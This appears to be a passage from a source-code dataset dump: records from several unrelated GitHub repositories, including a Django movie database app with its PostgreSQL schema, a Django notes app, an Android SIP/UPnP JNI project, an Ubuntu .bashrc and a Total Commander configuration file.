movie_pk, role):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n if isinstance(movie_pk, tuple):\n movie_pk = movie_pk[0]\n query = sql.SQL(\"SELECT * FROM involvement WHERE person={} and movie={} and role={};\").format(\n sql.Literal(person_pk), sql.Literal(movie_pk), sql.Literal(role)\n )\n self.cursor.execute(query)\n return self.cursor.fetchone()\n\n def insert_involvement(self, person_pk, movie_pk, role):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n if isinstance(movie_pk, tuple):\n movie_pk = movie_pk[0]\n query = sql.SQL(\"\"\"INSERT INTO involvement (\"person\", \"movie\", \"role\") VALUES ({}, {}, {});\"\"\").format(\n sql.Literal(person_pk), sql.Literal(movie_pk), sql.Literal(role)\n )\n self.cursor.execute(query)\n\n def get_involvements(self, person_pk):\n if isinstance(person_pk, tuple):\n person_pk = person_pk[0]\n query = sql.SQL(\"\"\"SELECT * FROM movie NATURAL JOIN involvement WHERE involvement.person={};\"\"\").format(\n sql.Literal(person_pk)\n )\n self.cursor.execute(query)\n\n return self.cursor.fetchall()\n\n # GENRES\n def get_genre(self, genre):\n match = filter(lambda x: x[1] == genre, self.genres)\n return next(match) if match else None\n\n # MPAA RATINGS\n def get_mpaa_rating(self, mpaa_rating):\n if mpaa_rating in ['N/A', 'NOT RATED', 'Not specified']:\n mpaa_rating = \"UNRATED\"\n match = filter(lambda x: x[1] == mpaa_rating, self.mpaa_ratings)\n return next(match) if match else None\n\n # COUNTRIES\n def get_country(self, country):\n match = filter(lambda x: x[1] == country, self.countries)\n return next(match) if match else None\n\n # LANGUAGES\n def get_language(self, language):\n match = filter(lambda x: x[1] == language, self.languages)\n return next(match) if match else None\n\n\nclass MockCursor:\n def execute(self, query):\n print(\"EXECUTING\", query)\n\n def fetchone(self):\n print(\"FETCH-ONE\")\n return {}\n" }, { "alpha_fraction": 0.694888174533844, "alphanum_fraction": 0.7012779712677002, "avg_line_length": 42.17241287231445, "blob_id": "d775f0761d3a5da15e8479855666825290aa96de", "content_id": "c232691fd91ca5f51fa2289ca2b1c54482f6c5e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1252, "license_type": "no_license", "max_line_length": 89, "num_lines": 29, "path": "/justmovies/urls.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "\"\"\"justmovies URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url\nfrom justmovies.views import MoviesView, PeopleView, DataView, MovieEditView\nfrom django.views.generic.base import RedirectView\n\nurlpatterns = [\n path('movies', MoviesView.as_view(), name='movies'),\n path('people', PeopleView.as_view(), name='people'),\n path('data', DataView.as_view(), name='data'),\n path('admin/', admin.site.urls),\n url(r'^movies/edit/(?P<movie_pk>\\d+)/$', MovieEditView.as_view(), name='movie_edit'),\n url(r'^.*$', RedirectView.as_view(url='/movies', permanent=False), name='home')\n]\n" }, { "alpha_fraction": 0.5203002095222473, "alphanum_fraction": 0.5353121757507324, "avg_line_length": 28.918367385864258, "blob_id": "6d6e39684497b59aea5a642b29e05dbcfd8a20ba", "content_id": "9ca185cfea719d21811e50a39c075daea6dd0217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2931, "license_type": "no_license", "max_line_length": 92, "num_lines": 98, "path": "/data/schema.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "-- FIRST DROP EVERYTHING -------------------------------------------\nDO $$ DECLARE\n record RECORD;\nBEGIN\n FOR record IN (SELECT tablename FROM pg_tables WHERE schemaname = current_schema()) LOOP\n EXECUTE 'DROP TABLE IF EXISTS ' || quote_ident(record.tablename) || ' CASCADE';\n END LOOP;\nEND $$;\n-- DROP TYPES\nDO $$\nBEGIN\n IF EXISTS (SELECT 1 FROM pg_type WHERE typname = 'role') THEN\n DROP TYPE role;\n END IF;\nEND$$;\n\n-- COUNTRY ---------------------------------------------------------\nCREATE TABLE country(\n pk SERIAL PRIMARY KEY,\n name VARCHAR(50) UNIQUE NOT NULL\n);\n\n-- RATING ----------------------------------------------------------\nCREATE TABLE rating(\n pk SERIAL PRIMARY KEY,\n name VARCHAR(20) UNIQUE NOT NULL\n);\n\n-- LANGUAGE --------------------------------------------------------\nCREATE TABLE language(\n pk SERIAL PRIMARY KEY,\n name VARCHAR(50) UNIQUE NOT NULL\n);\n\n-- GENRE -----------------------------------------------------------\nCREATE TABLE genre(\n pk SERIAL PRIMARY KEY,\n name VARCHAR(50) UNIQUE NOT NULL\n);\n\n-- PERSON ----------------------------------------------------------\nCREATE TABLE person(\n pk SERIAL PRIMARY KEY,\n name VARCHAR(200) NOT NULL,\n dob DATE,\n image VARCHAR(1000),\n intro TEXT\n);\n\n-- ROLE ------------------------------------------------------------\nCREATE TYPE ROLE AS ENUM('Actor', 'Director', 'Producer', 'Writer');\n\n-- ROLE ------------------------------------------------------------\nCREATE TABLE personal_role(\n pk SERIAL PRIMARY KEY,\n role ROLE,\n person INTEGER REFERENCES person(pk) ON DELETE CASCADE\n);\n\n-- MOVIE -----------------------------------------------------------\nCREATE TABLE movie(\n pk SERIAL PRIMARY KEY,\n title VARCHAR(500) NOT NULL,\n year SMALLINT,\n company VARCHAR(1000),\n budget INTEGER,\n gross VARCHAR(50),\n released VARCHAR(50),\n runtime VARCHAR(50),\n plot TEXT,\n awards TEXT,\n poster VARCHAR(1000),\n website VARCHAR(1000),\n imdb_rating VARCHAR(10),\n imdb_id VARCHAR(50),\n country INTEGER REFERENCES country(pk) ON DELETE CASCADE,\n rating INTEGER REFERENCES rating(pk) ON DELETE CASCADE,\n genre INTEGER REFERENCES genre(pk) ON DELETE CASCADE,\n language INTEGER REFERENCES language(pk) ON DELETE CASCADE\n);\n\n-- INVOLVEMENT -----------------------------------------------------\nCREATE TABLE involvement(\n pk SERIAL PRIMARY KEY,\n role ROLE,\n person INTEGER REFERENCES person(pk) ON DELETE CASCADE,\n movie INTEGER REFERENCES movie(pk) ON DELETE CASCADE\n);\n\n-- REVIEW ----------------------------------------------------------\nCREATE TABLE review(\n pk SERIAL PRIMARY KEY,\n -- user INTEGER REFERENCES user(pk) ON DELETE CASCADE, -- we don't have users yet\n movie INTEGER REFERENCES movie(pk) ON DELETE CASCADE,\n text TEXT,\n rating SMALLINT,\n constraint rating_range_check check(rating >= 1 and rating <= 10)\n);" } ]
14
ashishchandra-cmd/time_now
https://github.com/ashishchandra-cmd/time_now
7a3762bde15ebd2290710d882b0c7fb191837efb
fe678b80c78a72a9ee07907027e25ebae7651df7
28dccbcbd898fe095e3c9016b704eb6a07a7bdc2
refs/heads/master
2022-07-09T03:37:11.914973
2020-05-16T17:11:37
2020-05-16T17:11:37
264,487,215
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.723247230052948, "alphanum_fraction": 0.7306272983551025, "avg_line_length": 32.875, "blob_id": "89f0430bc00642975d9a357a22c0512dccb6928b", "content_id": "22ad4a4f144f940a69abff9111e5139eb59d7207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "no_license", "max_line_length": 66, "num_lines": 8, "path": "/datetimeproject/testapp/views.py", "repo_name": "ashishchandra-cmd/time_now", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nimport datetime\n# Create your views here.\ndef datetime_views(request):\n time=datetime.datetime.now()\n s='<h1> Hello Current Date and Time is :' +str(time)+ '</h1> '\n return HttpResponse(s)\n" } ]
1
freezmeinster/masjidx
https://github.com/freezmeinster/masjidx
2de6705944183ea2b89a133e62b4651206c0e791
984baf37925288c6b53b8c95740f69e46ed91e0a
bf5314f7dd23688d6674f6fb284b72e58fb42468
refs/heads/master
2020-11-24T22:31:09.289075
2019-12-16T10:53:49
2019-12-16T10:53:49
228,365,936
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7737002968788147, "alphanum_fraction": 0.7737002968788147, "avg_line_length": 20.600000381469727, "blob_id": "1ee7bb50fc241ff2ade0d14e58d6cf09f6dcda8f", "content_id": "1b8ef837c7c13a6293dcf8fd75dcaa75c30e071c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 48, "num_lines": 15, "path": "/notulen/admin.py", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Notes, Assignment, NotesTask\n\n\nclass AssignmentInline(admin.TabularInline):\n model = Assignment\n\[email protected](Notes)\nclass NotesAdmin(admin.ModelAdmin):\n inlines = [AssignmentInline,]\n\n\[email protected](NotesTask)\nclass NotesTaskAdmin(admin.ModelAdmin):\n pass\n\n\n\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 16, "blob_id": "2dd46491e24b31d377be947c6d6e6493eed0a3dc", "content_id": "bacbd63b2e7f64dfd1e2b01b57a9690e68c8d999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 34, "license_type": "no_license", "max_line_length": 28, "num_lines": 2, "path": "/Makefile", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "run:\n\t@python manage.py runserver\n" }, { "alpha_fraction": 0.6779359579086304, "alphanum_fraction": 0.6886121034622192, "avg_line_length": 27.100000381469727, "blob_id": "798effe86f301a33ea6d9e2a8109ee021261a21c", "content_id": "f7f4630e5af837cb5b1b0f193b5798ed1f861068", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 562, "license_type": "no_license", "max_line_length": 75, "num_lines": 20, "path": "/notulen/models.py", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Notes(models.Model):\n title = models.CharField(max_length=255)\n desc = models.TextField()\n\n def __str__(self):\n return self.title\n\nclass NotesTask(models.Model):\n name = models.CharField(max_length=255)\n \n def __str__(self):\n return self.name\n\nclass Assignment(models.Model):\n notes = models.ForeignKey(\"notulen.Notes\", on_delete=models.CASCADE)\n user = models.ForeignKey(\"auth.User\", on_delete=models.CASCADE)\n task = models.ForeignKey(\"notulen.NotesTask\", on_delete=models.CASCADE)\n" }, { "alpha_fraction": 0.7528089880943298, "alphanum_fraction": 0.7528089880943298, "avg_line_length": 16.799999237060547, "blob_id": "cc85e802424ea58305f610e369e6876a7131adf7", "content_id": "0b58e7a4b553c0c088081208ebf4c2730f29c5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/notulen/apps.py", "repo_name": "freezmeinster/masjidx", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass NotulenConfig(AppConfig):\n name = 'notulen'\n" } ]
4
fairyhunter13/rxwen-blog-stuff
https://github.com/fairyhunter13/rxwen-blog-stuff
bc8105a3562283e84dc61b0db82c07df4b0a1e28
77fb1b4009e6f0d68737aeaba2c0b9c588546b37
22eaa3480bf8c4c593a074d9cd252440c33d7604
refs/heads/master
2021-05-04T11:43:35.270902
2014-11-07T23:54:04
2020-07-12T10:15:52
48,232,033
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5947242379188538, "avg_line_length": 29.88888931274414, "blob_id": "4a0e2b6bad45d531d3bef1f17306741247ee381d", "content_id": "5448e271f4407ccd813879248fda85023b19dc93", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1668, "license_type": "permissive", "max_line_length": 104, "num_lines": 54, "path": "/android/exosip_sample/sip_jni/jni/sip-jni.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#include <string.h>\n#include <jni.h>\n\n#include\t<unistd.h>\n#include\t<android/log.h>\n#include\t<netinet/in.h>\n#include <eXosip2/eXosip.h>\n\nconst char* const LOG_TAG = \"SIP_JNI\";\n\nstatic void android_trace_func(char *fi, int li, osip_trace_level_t level, char *chfr, va_list ap)\n{\n __android_log_vprint(ANDROID_LOG_VERBOSE, LOG_TAG, chfr, ap);\n}\n\nvoid Java_com_rmd_sipjni_SipJni_startSipService(JNIEnv* env, jobject thiz )\n{\n //jclass cls = (*env)->FindClass(env, \"com/rmd/sipjni/SipJni\");\n // retrieve cls, mid only once for the sake of performance\n jclass cls = (*env)->GetObjectClass(env, thiz);\n jmethodID mid = (*env)->GetMethodID(env, cls, \"onIncomingCall\", \"(Ljava/lang/String;)Z\");\n jstring js = (*env)->NewStringUTF(env, \"incoming call\");\n int i, port = 5060;\n osip_trace_initialize_func(END_TRACE_LEVEL, &android_trace_func);\n i=eXosip_init();\n if (i!=0)\n return;\n i = eXosip_listen_addr (IPPROTO_UDP, NULL, port, AF_INET, 0);\n if (i!=0)\n {\n eXosip_quit();\n __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, \"%s\", \"could not initialize transport layer\\n\");\n return;\n }\n\n eXosip_event_t *je;\n for (;;)\n {\n je = eXosip_event_wait (0, 24*60*60*1000);\n eXosip_lock();\n eXosip_automatic_action ();\n eXosip_unlock();\n if (je == NULL)\n break;\n if (je->type == EXOSIP_CALL_INVITE)\n {\n __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, \"%s\", \"incomingCall returns\\n\");\n // call java callback function\n jboolean bl = (*env)->CallBooleanMethod(env, thiz, mid, js);\n }\n }\n\n return;\n}\n" }, { "alpha_fraction": 0.7249881625175476, "alphanum_fraction": 0.7259364724159241, "avg_line_length": 28.29166603088379, "blob_id": "f738d0952a8030ae7464195bec378deb8b9fc684", "content_id": "3b381ea812a3aeeaeb0ebab3eadc6dc858b85760", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 2109, "license_type": "permissive", "max_line_length": 53, "num_lines": 72, "path": "/android/pupnp_jni/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH := $(call my-dir)\n\ninclude $(CLEAR_VARS)\nLOCAL_MODULE := libpupnp\nLOCAL_C_INCLUDES := upnp/inc upnp/src/inc build/inc \\\n\tthreadutil/inc/ ixml/inc/ ixml/src/inc/\n\nLOCAL_LDLIBS := -llog\nLOCAL_CFLAGS := -DDEBUG -g\n\nLOCAL_SRC_FILES := \\\n\tupnp_jni.c \\\n\tupnp/src/ssdp/ssdp_device.c \\\n\tupnp/src/ssdp/ssdp_server.c \\\n\tupnp/src/ssdp/ssdp_ctrlpt.c \\\n\tupnp/src/ssdp/ssdp_ResultData.c \\\n\tupnp/src/genlib/service_table/service_table.c \\\n\tupnp/src/genlib/util/upnp_timeout.c \\\n\tupnp/src/genlib/util/membuffer.c \\\n\tupnp/src/genlib/util/strintmap.c \\\n\tupnp/src/genlib/util/util.c \\\n\tupnp/src/genlib/net/uri/uri.c \\\n\tupnp/src/genlib/net/http/httpreadwrite.c \\\n\tupnp/src/genlib/net/http/statcodes.c \\\n\tupnp/src/genlib/net/http/httpparser.c \\\n\tupnp/src/genlib/net/http/webserver.c \\\n\tupnp/src/genlib/net/http/parsetools.c \\\n\tupnp/src/genlib/net/sock.c \\\n\tupnp/src/genlib/miniserver/miniserver.c \\\n\tupnp/src/genlib/client_table/ClientSubscription.c \\\n\tupnp/src/genlib/client_table/client_table.c \\\n\tupnp/src/api/SubscriptionRequest.c \\\n\tupnp/src/api/Discovery.c \\\n\tupnp/src/api/FileInfo.c \\\n\tupnp/src/api/upnptools.c \\\n\tupnp/src/api/ActionRequest.c \\\n\tupnp/src/api/EventSubscribe.c \\\n\tupnp/src/api/UpnpString.c \\\n\tupnp/src/api/ActionComplete.c \\\n\tupnp/src/api/StateVarRequest.c \\\n\tupnp/src/api/StateVarComplete.c \\\n\tupnp/src/api/upnpapi.c \\\n\tupnp/src/api/upnpdebug.c \\\n\tupnp/src/api/Event.c \\\n\tupnp/src/uuid/sysdep.c \\\n\tupnp/src/uuid/uuid.c \\\n\tupnp/src/uuid/md5.c \\\n\tupnp/src/soap/soap_device.c \\\n\tupnp/src/soap/soap_ctrlpt.c \\\n\tupnp/src/soap/soap_common.c \\\n\tupnp/src/win_dll.c \\\n\tupnp/src/inet_pton.c \\\n\tupnp/src/urlconfig/urlconfig.c \\\n\tupnp/src/gena/gena_callback2.c \\\n\tupnp/src/gena/gena_ctrlpt.c \\\n\tupnp/src/gena/gena_device.c \\\n\tthreadutil/src/FreeList.c \\\n\tthreadutil/src/LinkedList.c \\\n\tthreadutil/src/ThreadPool.c \\\n\tthreadutil/src/TimerThread.c \\\n\tixml/src/ixmldebug.c \\\n\tixml/src/node.c \\\n\tixml/src/ixmlmembuf.c \\\n\tixml/src/attr.c \\\n\tixml/src/ixmlparser.c \\\n\tixml/src/element.c \\\n\tixml/src/nodeList.c \\\n\tixml/src/ixml.c \\\n\tixml/src/document.c \\\n\tixml/src/namedNodeMap.c\n\ninclude $(BUILD_SHARED_LIBRARY)\n" }, { "alpha_fraction": 0.682692289352417, "alphanum_fraction": 0.7884615659713745, "avg_line_length": 19.799999237060547, "blob_id": "901d662fbc8a842d54700819c2ee2d03aca020c9", "content_id": "534e48698b7696350d09648b4aaf5f7766036569", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 104, "license_type": "permissive", "max_line_length": 38, "num_lines": 5, "path": "/settings/android_studio_plugins.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "http://www.zhihu.com/question/28026027\n\n1. idea vim\n2. butterknife zelezny\n3. parcelable code generator\n" }, { "alpha_fraction": 0.6251298189163208, "alphanum_fraction": 0.6559363007545471, "avg_line_length": 31.829545974731445, "blob_id": "74abd3d9dd9e176692e38a9ef6d88e3e82aa808c", "content_id": "958d43f266a503edc760cc79c4959d9512a5a8a7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2889, "license_type": "permissive", "max_line_length": 151, "num_lines": 88, "path": "/settings/ubuntu_home/.bashrc", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "# ~/.bashrc: executed by bash(1) for non-login shells.\n# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)\n# for examples\n\n# If not running interactively, don't do anything\n[ -z \"$PS1\" ] && return\n\n# don't put duplicate lines in the history. See bash(1) for more options\nexport HISTCONTROL=ignoredups\nexport LANGUAGE=\"en_US.UTF-8\"\n# ... and ignore same sucessive entries.\nexport HISTCONTROL=ignoreboth\n\n# check the window size after each command and, if necessary,\n# update the values of LINES and COLUMNS.\nshopt -s checkwinsize\n\n# set -o vi\n\n# make less more friendly for non-text input files, see lesspipe(1)\n[ -x /usr/bin/lesspipe ] && eval \"$(lesspipe)\"\n\n# set variable identifying the chroot you work in (used in the prompt below)\nif [ -z \"$debian_chroot\" ] && [ -r /etc/debian_chroot ]; then\n debian_chroot=$(cat /etc/debian_chroot)\nfi\n\n# set a fancy prompt (non-color, unless we know we \"want\" color)\ncase \"$TERM\" in\nxterm-color)\n #PS1='${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$ '\n PS1='${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\][\\W]\\[\\033[00m\\]\\$ '\n ;;\n*)\n # PS1='${debian_chroot:+($debian_chroot)}\\u@\\h:\\w\\$ '\n PS1='${debian_chroot:+($debian_chroot)}\\u@\\h:[\\W]\\$ '\n ;;\nesac\n\n# Comment in the above and uncomment this below for a color prompt\n# PS1='${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\][\\W]\\[\\033[00m\\]\\$ '\n\n# If this is an xterm set the title to user@host:dir\ncase \"$TERM\" in\nxterm*|rxvt*)\n PROMPT_COMMAND='echo -ne \"\\033]0;${USER}@${HOSTNAME}: ${PWD/$HOME/~} - Terminal\\007\"'\n ;;\n*)\n ;;\nesac\n\n# Alias definitions.\n# You may want to put all your additions into a separate file like\n# ~/.bash_aliases, instead of adding them here directly.\n# See /usr/share/doc/bash-doc/examples in the bash-doc package.\n\n#if [ -f ~/.bash_aliases ]; then\n# . ~/.bash_aliases\n#fi\n\n# enable color support of ls and also add handy aliases\nif [ \"$TERM\" != \"dumb\" ]; then\n eval \"`dircolors -b`\"\n alias ls='ls --color=auto'\n #alias dir='ls --color=auto --format=vertical'\n #alias vdir='ls --color=auto --format=long'\nfi\n\n# some more ls aliases\n#alias ll='ls -l'\n#alias la='ls -A'\n#alias l='ls -CF'\n\n \n#alias bcscope=\"echo find source files; find ./ -regex '.*\\.\\(cpp\\|c\\|cxx\\|cc\\|h\\|hpp\\|hxx\\)' > cscope.files; echo build cscope; cscope -b; echo done \"\n\nalias mgrep='grep --color=auto -n -H --exclude=*.svn-base --exclude=cscope.* -I -r -E -s '\n# --exclude svn files\n# -I exclude binary files \n# -E support exended regular expression\n# -r recursive searching\n\n# enable programmable completion features (you don't need to enable\n# this, if it's already enabled in /etc/bash.bashrc and /etc/profile\n# sources /etc/bash.bashrc).\nif [ -f /etc/bash_completion ]; then\n . /etc/bash_completion\nfi\n" }, { "alpha_fraction": 0.5339038968086243, "alphanum_fraction": 0.5437787771224976, "avg_line_length": 23.901639938354492, "blob_id": "4192231f5b3c264123f85ef9fb4df15a55597b5a", "content_id": "ee6cfb42dc46e653f2e376afb091ccbe9beb7677", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1519, "license_type": "permissive", "max_line_length": 133, "num_lines": 61, "path": "/protocol/osip_logging/osip_log.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#define ENABLE_TRACE\n#include \"osip2/osip.h\"\n#include <stdio.h>\n\nvoid printf_trace_func (char *fi, int li, osip_trace_level_t level, char *chfr, va_list ap)\n{\n const char* desc = \" \";\n switch(level)\n {\n case OSIP_FATAL:\n desc = \" FATAL \";\n break;\n case OSIP_BUG:\n desc = \" BUG \";\n break;\n case OSIP_ERROR:\n desc = \" ERROR \";\n break;\n case OSIP_WARNING:\n desc = \"WARNING\";\n break;\n case OSIP_INFO1:\n desc = \" INFO1 \";\n break;\n case OSIP_INFO2:\n desc = \" INFO2 \";\n break;\n case OSIP_INFO3:\n desc = \" INFO3 \";\n break;\n case OSIP_INFO4:\n desc = \" INFO4 \";\n break;\n default:\n desc = \" \";\n }\n \n printf (\"|%s| <%s: %i> | \", desc, fi, li);\n vprintf(chfr, ap);\n printf (\"\\n\");\n}\n\n\nint main(int argc, _TCHAR* argv[])\n{\n // use plain file as logging storage\n // FILE* f = fopen(\"c:\\\\1.txt\", \"w\");\n // TRACE_INITIALIZE(END_TRACE_LEVEL, f);\n\n // use custom function\n osip_trace_initialize_func(END_TRACE_LEVEL, &printf_trace_func);\n\n // write log message\n OSIP_TRACE (osip_trace(__FILE__, __LINE__, static_cast<osip_trace_level_t>(OSIP_INFO1), NULL, \"osip_trace module initialized!\"));\n \n // trun log message of OSIP_INFO1 level off\n TRACE_DISABLE_LEVEL(OSIP_INFO1);\n \n OSIP_TRACE (osip_trace(__FILE__, __LINE__, static_cast<osip_trace_level_t>(OSIP_INFO1), NULL, \"osip_trace module initialized!\"));\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6991237998008728, "alphanum_fraction": 0.7796329855918884, "avg_line_length": 17.576051712036133, "blob_id": "27754c0843270d7b5e100720abc37e2423b7f596", "content_id": "460239d900a2d70469b0a3065c614834ad029196", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 6049, "license_type": "permissive", "max_line_length": 78, "num_lines": 309, "path": "/settings/totalcmd/wincmd.ini", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "[Configuration]\r\nInstallDir=d:\\totalcmd\r\nCompareTool=d:\\WinMerge\\WinMergeU.exe\r\nStartupScreen=0\r\nfirstmnu=3578\r\nFirstTime=0\r\ntest=0\r\nMainmenu=\r\nDirTabOptions=1976\r\nDirTabLimit=32\r\nonlyonce=1\r\nTrayIcon=0\r\nUseRightButton=1\r\nSavepath=1\r\nSavepanels=1\r\nMarkDirectories=1\r\nAlwaysToRoot=1\r\nSingleClickStart=0\r\nRenameSelOnlyName=1\r\nSaveCommands=1\r\nSaveHistory=1\r\nCountSpace=1\r\nCountMarked=1\r\n1hourdif=0\r\nCopyComments=6\r\nAligned extension=0\r\nSeparateTree=0\r\nPanelsVertical=0\r\nLogOptions=7198\r\nLogRotateLimit=0\r\nLogKeepCount=30\r\nExplorerForCopy=0\r\nWin95Delete=0\r\nUseTrash=1\r\nIconOverlays=0\r\nIconsSpecialFolders=3\r\nShowicons=2\r\nShowEXEandLNKicons=2\r\nIconsInMenus=16\r\nIconsOnNet=0\r\nShowCentury=1\r\nSizeStyle=3\r\nSizeFooter=3\r\nViewer=none\r\nEditor=gvim --remote-tab-silent\r\nViewertype=1\r\nAltSearch=2\r\nQuickSearchMatchBeginning=1\r\nQuickSearchExactMatch=0\r\nSoundDelay=-10\r\nFirstTimeUnpack=0\r\npluginbasedir=D:\\totalcmd\\plugins\r\nQuickSearchAutoFilter=1\r\nFirstTimeZIP=0\r\nttciniwritable=27103\r\nSyncFlags=0\r\nSyncButtons=63\r\nCompareCaseSensitive=0\r\nCompareIgnoreRepSpace=1\r\nCompareIgnoreRepeatedLines=1\r\nCompareVertical=0\r\nShowHiddenSystem=0\r\nUseLongNames=1\r\nSmall83Names=0\r\nOldStyleTree=0\r\nautotreechange=0\r\nDirBrackets=1\r\nShowParentDirInRoot=0\r\nSortDirsByName=1\r\nTips=2\r\nFileTipWindows=0\r\nWin32TipWindows=0\r\nSortUpper=0\r\nAutoComplete=1\r\n[Layout]\r\nDriveBar1=1\r\nDriveBar2=0\r\nDriveBarFlat=1\r\nInterfaceFlat=1\r\nDriveCombo=0\r\nDirectoryTabs=1\r\nXPthemeBg=0\r\nCurDir=1\r\nTabHeader=1\r\nStatusBar=1\r\nCmdLine=0\r\nKeyButtons=0\r\nHistoryHotlistButtons=0\r\nBreadCrumbBar=1\r\nButtonBar=1\r\n[1280x800 (8x16)]\r\nMenuChangeX=160\r\nMenuChangeY=120\r\nMenuChangeDX=960\r\nMenuChangeDY=560\r\nMenuChangeMax=0\r\nmaximized=1\r\nx=240\r\ny=100\r\ndx=800\r\ndy=600\r\nDivider=500\r\nDividerQuickView=500\r\nDividerComments=500\r\nTabstops=241,254,325,-1,736,93\r\nFontSize=10\r\nFontName=Consolas\r\nFontSizeWindow=10\r\nFontNameWindow=Consolas\r\nFontWeight=400\r\nFontWeightWindow=700\r\nFontNameDialog=Microsoft Sans Serif\r\nFontCharset=1\r\nFontCharsetWindow=1\r\nFontSizeDialog=9\r\nCmdSelX=318\r\nCmdSelY=176\r\nCmdSelDX=637\r\nCmdSelDY=371\r\nCmdSelMax=0\r\nTreeDlgX=166\r\nTreeDlgY=168\r\nTreeDlgDX=411\r\nTreeDlgDY=397\r\nTreeDlgMax=0\r\nRenameX=317\r\nRenameY=170\r\nRenameDX=646\r\nRenameDY=460\r\nRenameMax=0\r\nRenameTabs=115,145,345,405,525\r\nSearchX=365\r\nSearchY=266\r\nSearchDX=553\r\nSearchDY=179\r\nSearchMax=0\r\nConnectX=397\r\nConnectY=215\r\nConnectDX=485\r\nConnectDY=370\r\nConnectMax=0\r\nSyncX=318\r\nSyncY=113\r\nSyncDX=649\r\nSyncDY=470\r\nSyncMax=0\r\nSyncTabs=92,152,247,270,362,422\r\nCompareX=132\r\nCompareY=132\r\nCompareDX=960\r\nCompareDY=560\r\nCompareMax=1\r\nCompareDivider=500\r\n[Buttonbar]\r\nButtonheight=29\r\nFlatIcons=1\r\nSmallIcons=1\r\nSmallIconSize=16\r\nXPstyle=1\r\nButtonbar=D:\\totalcmd\\NO.BAR\r\n[Tabstops]\r\n0=241\r\n1=254\r\n3=325\r\n4=-1\r\n6=736\r\n5=93\r\nAdjustWidth=1\r\n[left]\r\npath=D:\\freegate\\\r\nShowAllDetails=1\r\nSpecialView=0\r\nshow=1\r\nsortorder=0\r\nnegative Sortorder=0\r\n[right]\r\npath=e:\\Projects\\7000v\\protocols\\\r\nShowAllDetails=1\r\nSpecialView=0\r\nshow=1\r\nsortorder=0\r\nnegative 